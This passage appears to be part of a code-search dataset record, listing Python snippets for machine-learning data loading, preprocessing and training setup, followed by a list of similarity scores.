= self.readDataFromFile()\n test_10k_x, test_10k_y, training_55k_x, training_55k_y, validation_5k_x, validation_5k_y = self.dataTransform(\n data_Test_Image, data_Test_Labels, data_Train_Images, data_Train_Labels)\n self.train = zip(training_55k_x, training_55k_y)\n self.valid = zip(validation_5k_x, validation_5k_y)\n self.test = zip(test_10k_x, test_10k_y)\n\n self.train_position = 0\n print ('Initialized!')", "def setUpClass(cls):\n cls.test_file_1 = \"/tmp/test_data_loader_dummy_1.pkl\"\n cls.test_file_2 = \"/tmp/test_data_loader_dummy_2.pkl\"\n cls.in_cols = [\"file\", \"id\", \"len\", \"seq\", \"phyche\", \"pssm\", \"logits\",\n \"ss\", \"h_0\", \"h_1\", \"h_2\", \"lm_logits\"]\n cls.out_cols = [\"dataset\", \"id\", \"len\", \"position\", \"amino\",\n \"phyche\", \"pssm\", \"logits\", \"ss\", \"h_0\", \"h_1\", \"h_2\",\n \"lm_logits\"]\n\n seq = np.array([[0., 0., 1.],\n [1., 0., 0.]])\n phyche = np.array([[0., 0.], # phyche\n [1., 0.]])\n pssm = np.array([[0., 0., .8], # pssm\n [.8, 0., 0.]])\n logits = np.array([[0.1, 0., 0.9], # logits\n [0.9, 0., 0.1]])\n ss = np.array([[0., 0., 1.], # ss\n [1., 0., 0.]])\n h_0 = np.array([[0., 0., 1., 0.],\n [1., 0., 0., 0.]])\n h_1 = np.array([[0., 0., 1., 0.],\n [1., 0., 0., 0.]])\n h_2 = np.array([[0., 0., 1., 0.], # h_2\n [1., 0., 0., 0.]])\n lm_logits = np.array([[0., 0., 
1.], # lm_logits\n [1., 0., 0.]])\n\n ex_1_in = (\"dummy_train.tfrecords\", # file\n \"id1\", # id\n 2, # len\n seq,\n phyche,\n pssm,\n logits,\n ss,\n h_0,\n h_1,\n h_2,\n lm_logits,\n )\n ex_1_out = [tuple([\"train\", ex_1_in[1], ex_1_in[2], j] + [ex_1_in[i][j, :] for i in range(3, len(ex_1_in))]) for j in range(2)]\n\n in_df = pd.DataFrame.from_records(data=[ex_1_in], columns=cls.in_cols)\n # write to file\n in_df.to_pickle(cls.test_file_1)\n\n cls.out_df = pd.DataFrame.from_records(data=ex_1_out, columns=cls.out_cols)", "def prepare_learning(self):\n print 'Separating inputs and outputs...'\n self.inputs, self.outputs = extract_samples(self.matches,\n self.input_features,\n self.output_feature)\n\n print 'Normalizing data...'\n self.normalizer, self.inputs = normalize(self.inputs)\n\n print 'Separating train and test sets...'\n self.train_inputs, self.train_outputs, self.test_inputs, self.test_outputs = split_samples(self.inputs, self.outputs)\n\n print 'Building neural network...'\n self.network = buildNetwork(len(self.input_features),\n 2 * len(self.input_features),\n 1,\n outclass=SigmoidLayer,\n bias=True)\n\n print 'Building and filling pybrain train set object...'\n self.train_set = ClassificationDataSet(len(self.input_features))\n\n for i, input_line in enumerate(self.train_inputs):\n self.train_set.addSample(self.train_inputs[i],\n [self.train_outputs[i] - 1])\n\n self.trainer = BackpropTrainer(self.network, dataset=self.train_set,\n momentum=0.5, weightdecay=0.0)\n\n self.train_set.assignClasses()", "def train(self, train_loader):\n pass", "def init_data(in_arg, model_param, phase=\"train\"): \n # Firstly, set the directories\n # PRE-REQUISITES: \n # train & valid sets (1 per folder) must exist within the in_arg.data_dir (to improve if I have some time later on)\n # train folder must be \"train\", validation folwer must be \"valid\"\n # each file must be correctly classified (=within the correct id folder). 
file name doesn't matter\n model_param['data_dir'] = in_arg.data_dir\n train_dir = model_param['data_dir'] + '/train'\n valid_dir = model_param['data_dir'] + '/valid'\n\n model_param['save_dir'] = in_arg.save_dir\n \n # Prepare the transformations for train & validation sets\n train_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n valid_transforms = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n try:\n # Load the datasets with ImageFolder\n train_dataset = datasets.ImageFolder(train_dir, transform=train_transforms)\n valid_dataset = datasets.ImageFolder(valid_dir, transform=valid_transforms)\n\n model_param['class_to_idx'] = train_dataset.class_to_idx\n \n # TODO: Using the image datasets and the trainforms, define the dataloaders\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=in_arg.batch_size, shuffle = True)\n valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=in_arg.batch_size, shuffle = True)\n\n # Initialize the cat_to_name catalog\n #with open(in_arg.cat_to_name, 'r') as f:\n #cat_to_name = json.load(f)\n # model_param['cat_to_name'] = json.load(f)\n\n except Exception as e:\n print(\"An exception occured: {}.\".format(e))\n sys.exit(0)\n\n print(\"Data loading completed!\")\n\n # Return all parameters we will need later on\n return train_loader, valid_loader, model_param", "def get_dataloaders(data_dir,train_batch_size,val_batch_size,aug_flag):\n # Create the dataset object.\n transformed_dataset = PersonDataset(data_dir,False)\n # dataloader for train and validation\n validation_split = 0.2\n shuffle_dataset = True\n #random seed to keep the train-val split constant for inference purpose\n random_seed= 42\n # create indices for training and validation splits.\n dataset_size = len(transformed_dataset)\n # we create the indices using python range function and store it into a list\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split*dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices,val_indices = indices[split:],indices[:split]\n # create dataloaders...\n train_sampler = SubsetRandomSampler(train_indices)\n val_sampler = SubsetRandomSampler(val_indices)\n train_aug,val_aug = aug_flag,False\n train_loader = DataLoader(PersonDataset(data_dir,train_aug), batch_size=train_batch_size, shuffle=False, num_workers=0,sampler = train_sampler)\n val_loader = DataLoader(PersonDataset(data_dir,val_aug), batch_size=val_batch_size, shuffle=False, num_workers=0,sampler = val_sampler)\n\n # dictionary for data loaders..\n dataloaders = {\"train\" :train_loader,\n \"val\":val_loader\n }\n return dataloaders", "def setUpTestData(cls):\n data_gen.run()", "def setUpTestData(cls):\n data_gen.run()", "def setUpTestData(cls):\n data_gen.run()", "def setUpTestData(cls):\n data_gen.run()", "def load_data(batch_size=batch_size):\n trainset = LibriSpeechDataset(training_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds))\n testset = LibriSpeechDataset(validation_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds), stochastic=False)\n\n train_loader = DataLoader(trainset, batch_size=batch_size, num_workers=1, shuffle=True, drop_last=True)\n test_loader = DataLoader(testset, 
batch_size=1, num_workers=1, drop_last=True)\n\n return train_loader, test_loader", "def data_preprocessing():\n lineid_content = get_lineid_content()\n print('Read movie_lines.txt file complete...')\n convos = get_convos()\n print('Read movie_conversations.txt file complete...')\n print('Building dataset')\n get_data(lineid_content, convos)", "def setup_datasets(self):\r\n\r\n train_transform = transforms.Compose(\r\n [\r\n transforms.Resize(self.crop_size),\r\n transforms.RandomRotation(degrees=self.random_angle, resample=Image.BILINEAR),\r\n transforms.RandomResizedCrop(\r\n size=self.crop_size, scale=(1-self.random_scale, 1+self.random_scale), ratio=(1, 1)),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225]\r\n )\r\n ]\r\n )\r\n val_transform = transforms.Compose(\r\n [\r\n transforms.Resize(self.crop_size),\r\n transforms.CenterCrop(self.crop_size),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225]\r\n )\r\n ]\r\n )\r\n\r\n train_dataset = CocoDatasetPairs(\r\n root_dir=self.coco_path,\r\n set_name='train2014',\r\n transform=train_transform,\r\n dataset_size_ratio=self.dataset_size_ratio\r\n )\r\n train_subset_dataset = Subset(train_dataset, range(0, len(train_dataset), 5*self.dataset_size_ratio))\r\n val_dataset = CocoDatasetPairs(\r\n root_dir=self.coco_path,\r\n set_name='val2014',\r\n transform=val_transform,\r\n )\r\n\r\n train_loader = DataLoader(\r\n train_dataset,\r\n batch_size=self.batch_size,\r\n shuffle=True,\r\n num_workers=self.num_workers\r\n )\r\n train_subset_loader = DataLoader(\r\n train_subset_dataset,\r\n batch_size=self.batch_size,\r\n shuffle=False,\r\n num_workers=self.num_workers\r\n )\r\n val_loader = DataLoader(\r\n val_dataset,\r\n batch_size=self.batch_size,\r\n shuffle=False,\r\n num_workers=self.num_workers\r\n )\r\n return train_loader, train_subset_loader, val_loader", "def prepare_data(self, rm_orig: bool = False, tiling: bool = True) -> None:\n folders_found = [\n d.name\n for d in self.save_dir.iterdir()\n if d.name.lower() in (\"lizard_images1\", \"lizard_images2\", \"lizard_labels\")\n and d.is_dir()\n ]\n phases_found = [\n d.name\n for d in self.save_dir.iterdir()\n if d.name in (\"train\", \"test\", \"valid\") and d.is_dir()\n ]\n\n patches_found = []\n if phases_found:\n patches_found = [\n sub_d.name\n for d in self.save_dir.iterdir()\n if d.name in (\"train\", \"test\", \"valid\") and d.is_dir()\n for sub_d in d.iterdir()\n if sub_d.name\n in (\n f\"{d.name}_im_patches\",\n f\"{d.name}_mask_patches\",\n f\"{d.name}_patches\",\n )\n and any(sub_d.iterdir())\n ]\n\n if len(folders_found) < 3 and not phases_found:\n print(\n \"Found no data or an incomplete dataset. Downloading the whole thing...\"\n )\n for d in self.save_dir.iterdir():\n shutil.rmtree(d)\n LizardDataModule.download(self.save_dir)\n else:\n print(\"Found all folds. 
Skip downloading.\")\n\n if not phases_found:\n print(\"Splitting the files into train, valid, and test sets.\")\n for phase, fold_ix in self.fold_split.items():\n img_dir1 = self.save_dir / \"Lizard_Images1\"\n img_dir2 = self.save_dir / \"Lizard_Images2\"\n label_dir = self.save_dir / \"Lizard_Labels\"\n save_im_dir = self.save_dir / phase / \"images\"\n save_mask_dir = self.save_dir / phase / \"labels\"\n\n self._split_to_fold(\n img_dir1,\n img_dir2,\n label_dir,\n save_im_dir,\n save_mask_dir,\n fold_ix,\n not rm_orig,\n )\n else:\n print(\n \"Found splitted Lizard data. \"\n \"If in need of a re-download, please empty the `save_dir` folder.\"\n )\n\n if rm_orig:\n for d in self.save_dir.iterdir():\n if \"lizard\" in d.name.lower() or \"macosx\" in d.name.lower():\n shutil.rmtree(d)\n\n if tiling and not patches_found:\n print(\"Patch the data... This will take a while...\")\n for phase in self.fold_split.keys():\n save_im_dir = self.save_dir / phase / \"images\"\n save_mask_dir = self.save_dir / phase / \"labels\"\n\n if self.dataset_type == \"hdf5\":\n sdir = self.save_dir / phase / f\"{phase}_patches\"\n sdir.mkdir(parents=True, exist_ok=True)\n writer = HDF5Writer(\n in_dir_im=save_im_dir,\n in_dir_mask=save_mask_dir,\n save_dir=sdir,\n file_name=f\"lizard_{phase}.h5\",\n patch_size=self.patch_size,\n stride=self.stride,\n transforms=[\"rigid\"],\n )\n else:\n sdir_im = self.save_dir / phase / f\"{phase}_im_patches\"\n sdir_mask = self.save_dir / phase / f\"{phase}_mask_patches\"\n sdir_im.mkdir(parents=True, exist_ok=True)\n sdir_mask.mkdir(parents=True, exist_ok=True)\n writer = FolderWriter(\n in_dir_im=save_im_dir,\n in_dir_mask=save_mask_dir,\n save_dir_im=sdir_im,\n save_dir_mask=sdir_mask,\n patch_size=self.patch_size,\n stride=self.stride,\n transforms=[\"rigid\"],\n )\n writer.write(tiling=True, pre_proc=self._process_label, msg=phase)\n else:\n print(\n \"Found processed Lizard data. 
\"\n \"If in need of a re-process, please empty the `save_dir` folders.\"\n )", "def __init__(self, options):\n print('Prepare the network and data.')\n self._options = options\n # Network.\n self._net = torch.nn.DataParallel(BCNN()).cuda()\n # Load the model from disk.\n #self._net.load_state_dict(torch.load(self._path['model']))\n print(self._net)\n # Criterion.\n self._criterion = torch.nn.CrossEntropyLoss().cuda()\n # Solver.\n self._solver = torch.optim.SGD(\n self._net.parameters(), lr=self._options['base_lr'],\n momentum=0.9, weight_decay=self._options['weight_decay'])\n self._scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n self._solver, mode='max', factor=0.1, patience=3, verbose=True,\n threshold=1e-4)\n\n self._train_path = os.path.join(self._options['text_path'],'train.txt')\n self._test_path = os.path.join(self._options['text_path'],'test.txt')\n\n #Dataloader\n transform = T.Compose([\n T.Resize(448), \n T.CenterCrop(448), \n T.ToTensor(), \n T.Normalize(mean=(0.485, 0.456, 0.406),\n std=(0.229, 0.224, 0.225)) \n ])\n\n train_data = Data( train_path = self._train_path, aug_path = options['aug_data'], img_transform=transform)\n\n\n\n test_data = Data( train_path = self._test_path, aug_path = options['aug_data'], img_transform=transform)\n\n\n\n self._train_loader = torch.utils.data.DataLoader(dataset=train_data,\n batch_size=self._options['batch_size'],drop_last=True, pin_memory=True,\n shuffle=True,num_workers=4)\n\n self._test_loader = torch.utils.data.DataLoader(dataset=test_data,\n batch_size=self._options['batch_size'],pin_memory=True,\n shuffle=False,num_workers=4)", "def load_all(): \n training_data = dict() \n for i in range(7):\n training_data[i+1] = load_data(i+1) \n\n return training_data", "def __init__(self, data_loader,\n data_train,\n data_test,\n dataset_name,\n model_kind,\n transaction_cost=0.0,\n BATCH_SIZE=30,\n GAMMA=0.7,\n ReplayMemorySize=50,\n TARGET_UPDATE=5,\n n_step=10,\n window_size=20):\n self.data_train = data_train\n self.data_test = data_test\n self.DATASET_NAME = dataset_name\n self.BATCH_SIZE = BATCH_SIZE\n self.GAMMA = GAMMA\n self.ReplayMemorySize = ReplayMemorySize\n self.window_size = window_size\n self.model_kind = model_kind\n\n self.split_point = data_loader.split_point\n self.begin_date = data_loader.begin_date\n self.end_date = data_loader.end_date\n\n self.TARGET_UPDATE = TARGET_UPDATE\n self.n_step = n_step\n self.transaction_cost = transaction_cost\n\n self.memory = ReplayMemory(ReplayMemorySize)\n\n self.train_test_split = True if data_test is not None else False\n\n self.EPS_START = 0.9\n self.EPS_END = 0.05\n self.EPS_DECAY = 500\n\n self.steps_done = 0\n\n self.PATH = os.path.join(Path(os.path.abspath(os.path.dirname(__file__))).parent,\n f'Results/{self.DATASET_NAME}/'\n f'{self.model_kind}; '\n f'DATA_KIND({self.data_train.data_kind}); '\n f'BEGIN_DATE({self.begin_date}); '\n f'END_DATE({self.end_date}); '\n f'SPLIT_POINT({self.split_point}); '\n f'WindowSize({self.window_size}); '\n f'BATCH_SIZE{self.BATCH_SIZE}; '\n f'GAMMA{self.GAMMA}; '\n f'REPLAY_MEMORY_SIZE{self.ReplayMemorySize}; '\n f'TARGET_UPDATE{self.TARGET_UPDATE}; '\n f'N_STEP{self.n_step}')\n\n if not os.path.exists(self.PATH):\n os.makedirs(self.PATH)\n\n self.model_dir = os.path.join(self.PATH, f'model.pkl')", "def build_dataloader(bs, shfle):\n # change get_labels to correct version (classification vs regression)\n dataset = TensorDataset(rand_data(), get_labels())\n dataset = TensorDataset(rand_data(), get_regression_labels())\n\n return 
DataLoader(dataset, batch_size=bs, shuffle=shfle, num_workers=0)" ]
[ "0.68454164", "0.6782941", "0.67057943", "0.66403675", "0.65843046", "0.65607405", "0.65350705", "0.65200335", "0.6494558", "0.6458471", "0.6375916", "0.6352485", "0.63391966", "0.6334616", "0.6328361", "0.6314732", "0.6312712", "0.62332684", "0.62095624", "0.6204455", "0.62037885", "0.6193522", "0.61776704", "0.6177272", "0.617649", "0.6150083", "0.61468786", "0.6109438", "0.6103655", "0.610334", "0.60936505", "0.60868806", "0.6085787", "0.6077591", "0.6075107", "0.6067179", "0.6032412", "0.60206735", "0.6012645", "0.60022455", "0.5996328", "0.59960896", "0.5994449", "0.5985566", "0.5979145", "0.59753054", "0.5974127", "0.597141", "0.59430534", "0.59384704", "0.5929569", "0.5928563", "0.5926079", "0.5925887", "0.59235144", "0.592078", "0.5920379", "0.591959", "0.5915169", "0.5908723", "0.5908723", "0.5905615", "0.5894279", "0.5889429", "0.5888431", "0.58862364", "0.58852345", "0.58789504", "0.587634", "0.5870902", "0.5865679", "0.5863221", "0.5854959", "0.5845867", "0.5842063", "0.5840054", "0.58399147", "0.5829995", "0.5828404", "0.58274424", "0.58233255", "0.58158994", "0.58062136", "0.580486", "0.5801704", "0.57963496", "0.57934284", "0.5790182", "0.57876784", "0.5780892", "0.5780892", "0.5780892", "0.5780892", "0.5779102", "0.577784", "0.5777814", "0.57766914", "0.5776682", "0.5771022", "0.5770152", "0.57697946" ]
0.0
-1
Necessary initialisations for command line arguments
def initialise(): # Logfile for logging log_filename = alib.log_filename_init() if log_filename is None: print("\nError: Failed to initialise Log File Name. aborting\n") return alib.FAIL_GENERIC parser = argparse.ArgumentParser(description=""" Example command lines: -d DEBUG --ss c:/tmp/x.xlsx --ss "C:/work/sample doc/Out of Service Codes.xlsx" """, formatter_class=argparse.RawTextHelpFormatter) # --- DB parameters --- # def_dir = 'C:/work/stuff/' # m_def_dir = 'master_OneDrive_2017-04-07/Master Validated Templates by Club (Controlled)' # mc_def_dir = 'master_common_OneDrive_2017-04-07/Master Validated Common Data Templates (Controlled)' parser.add_argument('--club_dir', help='club files directory', default=None, required=False) parser.add_argument('--club_common_dir', help='club common files directory', default=None, required=False) parser.add_argument('--m_dir', help='master directory', default=None, required=False) parser.add_argument('--mc_dir', help='master common directory', default=None, required=False) parser.add_argument('--all_dir', help='directory containing all of the above', default=None, required=False) parser.add_argument('--quick_debug', help='only load cc and mc files, used for debugging only', default=None, action='store_true', required=False) # Add debug arguments parser.add_argument('-d', '--debug', help='Log messages verbosity: NONE (least), DEBUG (most)', choices=('NONE', 'CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'), default="INFO", required=False) # Sort though the arguments, ensure mandatory are populated args = alib.args_validate(parser, log_filename) return (args, log_filename)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialise(self, args, environ):", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. \"\n # \"Zip format\",\n # required=False)", "def setUp(self):\n self.parser = command_line.get_args()", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def init_args():\n parser = argparse.ArgumentParser(\n description=\"DeltaSherlock Client software.\")\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('-c', '--config', action='store', dest='config_file',\n default='./config.ini', help=\"Path to config file. [default: \\\n %(default)s]\")\n parser.add_argument('-d', '--daemon', action='store_true', dest='daemon',\n default=False, help=\"Run in daemon mode. [default: \\\n %(default)s]\")\n return parser.parse_args()", "def initialize(self, args):\n\t\tpass", "def main() -> None:\n init(args=sys.argv[1:])", "def setup_args(cls, parser):\n pass", "def initialize():\n\n parser = argparse.ArgumentParser(\n description='This function takes a gene count file, a gene name, and \\\n an output file as parameters, and creates a file with the \\\n sample IDs and counts for that gene.')\n parser.add_argument('-i',\n '--data',\n type=str,\n help='The file name of the dataset.',\n required=True)\n parser.add_argument('-g',\n '--gene',\n type=str,\n help='The name of the target gene.',\n required=True)\n parser.add_argument('-o',\n '--output',\n type=str,\n help='The file name of the output file.',\n required=True)\n\n args_parse = parser.parse_args()\n\n return args_parse", "def __init__(self):\n self.parser = argparse.ArgumentParser(prog='PROG')\n self.parser.add_argument(\"--idir\", action=\"store\",\n dest=\"idir\", default=\"\", help=\"Input data path\")\n self.parser.add_argument(\"--dates\", action=\"store\",\n dest=\"dates\", default=\"\", help=\"dates or dates-rante to read, e.g. 
YYYYMMDD-YYYYMMDD\")", "def prepare_arguments(self, parser):\n pass", "def _set_default_args(self):\n self._parser.add_argument(\"username\")\n self._parser.add_argument(\"password\")\n self._parser.add_argument(\n \"--start\",\n help=\"Start date for the scraper in iso format, eg: 2017-11-19\",\n type=str,\n default=None,\n )\n self._parser.add_argument(\n \"--end\",\n help=\"End date for the scraper in iso format\",\n type=str,\n default=None,\n )\n self._parser.add_argument(\n \"--skip-delete\",\n help=\"Delete the scraper folder in /tmp after run\",\n action=\"store_true\",\n )", "def _prepare(self):\n # Customize commandline arguments\n parser = argparse.ArgumentParser()\n self.initArgumentParser(parser, defaults=self.default_binding_overrides)\n self.__options = parser.parse_args()\n self.__bindings.update(args_util.parser_args_to_bindings(self.__options))\n\n self.start_logging()", "def init_args():\n parser = argparse.ArgumentParser(description='Create xls for Tom')\n parser.add_argument('start', metavar='N', type=int, help='starting '\n 'number')\n parser.add_argument('total_x', metavar='N', type=int,\n help='total number of x rows')\n parser.add_argument('total_y', metavar='N', type=int,\n help='total number of y columns')\n parser.add_argument('filename', metavar='NAME', default='test.csv',\n type=str, help='file name to write to, should end in '\n 'csv')\n return parser.parse_args()", "def setup_default_arguments(self):\n self.add_argument('--clean', action='store_true',\n help='Cleans all generated files.')", "def setup_cmd_args():\n parser = argparse.ArgumentParser(description=\"This program will query G-POD and COPHUB on the same datasets, in order to obtain the number of data results, compare them compile a report with the differences.\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n # parser.add_argument(\"root_dir\", help=\"The root directory containing data to check\")\n # parser.add_argument(\"--workspace\", help=\"Set Workspace manually\")\n parser.add_argument(\"--outputlist\", help=\"Folder to write the output lists with the un-synced products.\", default=\"c:\\\\temp\\\\\")\n parser.add_argument(\"--daysback\", help=\"Report with a given number of days back from today\", default=0)\n parser.add_argument(\"--dataset\", help=\"Set which dataset to query (chose S3A_SR_1_SRA_A_PREOPS or S3B_SR_1_SRA_A_NTC)\")\n parser.add_argument(\"--startdate\", help=\" The Start Date (format: YYYY-MM-DD) \", default=\"2016-06-01\")\n parser.add_argument(\"--enddate\",help=\" The End Date (format: YYYY-MM-DD)\")\n parser.add_argument(\"--cphubuser\",help=\"COPHUB username\", required=True)\n parser.add_argument(\"--cphubpw\",help=\"COPHUB password\", required=True)\n parser.add_argument(\"-email\", type=str, help=\"Email to send the results\", action=\"append\")\n parser.add_argument('-t', action='store_true', help=\"Today as enddate. 
Otherwise the last day of the previous month is considered.\")\n parser.add_argument('-n', action='store_true', help=\"Normal numeric check\")\n parser.add_argument('-m', action='store_true', help=\"Monthly check with product listing.\")\n return parser.parse_args()", "def initialize():\n\n global cmdarg\n # Open syslog for error message tracking\n syslog.openlog(\"munin-chrony\", 0, syslog.LOG_DAEMON)\n\n # Try to get the command-line argument, if there is one (usually either\n # 'config' or nothing)\n try:\n cmdarg = sys.argv[1]\n except IndexError:\n # It's not actually an error if this is out of range -- it just means\n # there wasn't an argument, so don't run in config mode\n cmdarg = \"\"", "def initialize():\n\n parser = build_arg_parser()\n par = parser.parse_known_args()[0]\n\n # Main arguments.\n set('run_mode', par.run_mode)\n set('input_files', par.image)\n\n # Sub-parser specific arguments.\n if par.run_mode == 'train':\n\n set('batch_size', par.batch_size)\n set('drop', par.drop)\n set('epochs', par.epochs)\n set('model', par.model)\n set('level', par.level)\n set('vfrac', par.vfrac)\n set('data_augm', par.data_augm)\n set('summary', par.summary)\n set('outdir', par.outdir)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n set('discriminator', par.discriminator)\n\n elif par.run_mode == 'predict':\n\n set('tile_edge', par.edge)\n set('model', par.model)\n set('save_conv2d_kernels', par.save_conv2d_kernels) \n set('save_conv2d_outputs', par.save_conv2d_outputs) \n set('colormap', par.colormap)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n\n elif par.run_mode == 'diagnose': \n \n set('model', par.model) \n \n else:\n \n pass", "def init(self, args):\n return True", "def init():\n global opts\n global args\n \n # get options\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hvs:b:n:\", [\"--help\", \"--version\", \n \"--suffix=\", \"--begin=\", \"--name=\"])\n except getopt.GetoptError as err:\n print str(err)\n getHelp()\n sys.exit()\n else:\n parseOpts()", "def __init__(self, ignored_args = [], **common_options):\n self.ignored_args = ignored_args\n self.common_options = self._fix_argparse_dicts(common_options)", "def _pre_argument_parsing(self):\n pass", "def test_parse_arguments_default(self):\n self.assertEqual(self.args.python, sys.executable)\n self.assertEqual(self.args.pip_packages, [])\n self.assertEqual(self.args.number_of_threads, multiprocessing.cpu_count())\n self.assertEqual(self.args.cmake_installer,\n CMAKE_INSTALLER_URL_BY_HOST_PLATFORM.get(sys.platform))\n self.assertEqual(self.args.cmake_source_project_root,\n os.path.join(os.getcwd(), 'git', 'falken'))\n self.assertEqual(self.args.cmake_copybara_variable, 'FALKEN_DIR')\n self.assertIsNone(self.args.cmake_configure_args)\n self.assertEqual(self.args.cmake_generator,\n cmake_runner.CMakeRunner.default_generator())\n self.assertEqual(\n self.args.cmake_target_architecture,\n cmake_runner.CMakeRunner.default_architecture(\n cmake_runner.CMakeRunner.default_generator()))\n self.assertEqual(self.args.cmake_build_dir,\n os.path.join(os.getcwd(), 'build'))\n self.assertEqual(self.args.cmake_build_configs, CMAKE_DEFAULT_BUILD_CONFIGS)\n self.assertIsNone(self.args.cmake_package_configs)\n self.assertEqual(self.args.cmake_package_generator, 'ZIP')\n self.assertIsNone(self.args.cmake_test_regex)\n self.assertEqual(self.args.output_dir, 'output')\n 
self.assertIsNone(self.args.copy_artifacts)\n self.assertIsNone(self.args.zip_artifacts)", "def parse_arguments(args):", "def setup_args():\n parser = ParlaiParser()\n parser.add_argument(\n '-n',\n '--num-episodes',\n default=-1,\n type=int,\n help='Total number of episodes to convert, -1 to convert all examples',\n )\n parser.add_argument(\n '-of',\n '--outfile',\n default=None,\n type=str,\n help='Output file where to save, by default will be created in /tmp',\n )\n parser.add_argument(\n '-s1id', '--speaker-0-id', type=str, help='Speaker id of agent who speaks first'\n )\n parser.add_argument(\n '-s1id',\n '--speaker-1-id',\n type=str,\n help='Speaker id of agent who speaks second',\n )\n parser.add_argument(\n '--prepended-context',\n type='bool',\n default=False,\n help='specify if the context is prepended to the first act',\n )\n parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)\n parser.set_defaults(datatype='train:ordered')\n\n return parser", "def test_default_parse_args(self):\n self.assertEqual(self.args.router, poll.DEFAULT_ROUTER)\n self.assertEqual(self.args.port, poll.DEFAULT_PORT)\n self.assertEqual(self.args.interval, poll.DEFAULT_INTERVAL)\n self.assertEqual(self.args.community, poll.DEFAULT_COMMUNITY)\n self.assertEqual(self.args.iterations, poll.DEFAULT_ITERATIONS)", "def test_arg_parser_init(self):\n args = self.parser.parse_args(['init'])\n self.assertEqual(args.command, 'init')", "def init(*, args: List[str]) -> None:\n logs.show_presentation()\n execute.parse_args(args=args)", "def main(args):", "def main(args):", "def main(args=None):", "def main(args=None):", "def __init__(self, argv):\n self._argv = argv", "def get_cli_arguments(self):\n pass", "def __init__(self, argparser):\n super().__init__()\n argparser.add_argument(\n \"-b\", \"--config-seed\", dest=\"config_seed\",\n help=\"configuration seed/blob\",\n type=str, default=constants.DEFAULT_CONFIG_SEED\n )\n argparser.add_argument(\n \"-e\", \"--config-variable\", dest=\"config_variable\",\n help=\"name of environment variable with config\",\n type=str, default=constants.DEFAULT_CONFIG_ENV_KEY\n )\n argparser.add_argument(\n \"-c\", \"--config-file\", dest=\"config_file\",\n help=\"path to config file\",\n type=str, default=constants.DEFAULT_CONFIG_PATH\n )\n argparser.add_argument(\n \"-s\", \"--suite\", dest=\"suite\",\n help=\"test suite to run\",\n type=str\n )\n argparser.add_argument(\n \"-l\", \"--list-suites\", dest=\"list_suites\",\n help=\"list available test suites\",\n action=\"store_true\"\n )", "def __init__(self, commandline_args):\n self.commit = commandline_args['commit']\n self.registry = commandline_args['registry']\n self.version = commandline_args['xl_version']\n self.image_version = image_version(commandline_args['xl_version'], commandline_args['suffix'])", "def __init__(self, args: argparse.Namespace):\n self._args = args", "def _initialize_from_cookiecutter_args(self, cookiecutter_args: dict[str, str]):\n self.golden_tests = cookiecutter_args[\"add_golden\"] == \"y\"\n self.github_owner = cookiecutter_args[\"github_owner\"]\n # Allow copyright holder and copyright year to be missing in the cookiecutter\n # args. 
Fallback to VSHN AG <info@vshn.ch> and the current year here.\n self.copyright_holder = cookiecutter_args.get(\n \"copyright_holder\", \"VSHN AG <info@vshn.ch>\"\n )\n self.copyright_year = cookiecutter_args.get(\"copyright_year\")\n if \"test_cases\" in cookiecutter_args:\n self.test_cases = cookiecutter_args[\"test_cases\"].split(\" \")\n else:\n self.test_cases = [\"defaults\"]\n\n return False", "def setup():\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--rows\", type=int, default=10, help=\"Number of rows to generate in demo file\")\n parser.add_argument(\"--filename\", type=str, default=\"..//data//demo.csv\", help=\"Filename of demo data\")\n parser.add_argument(\"--search_term\", type=str, default=\"Street\", help=\"Search term to look for in address info\")\n args = parser.parse_args()\n # generate_data_file(args.filename, args.rows)\n return args\n except Exception as e:\n print(e)\n exit(-1)", "def _init_parser():\n\t\n\t_parser = argparse.ArgumentParser()\n\t_parser.add_argument(\"--pull\", help=\"pull scripts from UR3\", action=\"store_true\")\n\t_parser.add_argument(\"--create\", help=\"create data base from script files\", action=\"store_true\")\n\t_parser.add_argument(\"--clear\", help=\"clear all data base\", action=\"store_true\")\n\treturn _parser", "def setUp(self):\n\n self.niceArgV = (\"--long Alpha -n Beta \"\n \"--shortless Gamma -f --myflag \"\n \"--myparam Tofu\").split()\n\n self.nice = WellBehaved()\n\n self.nice.parseOptions(self.niceArgV)", "def 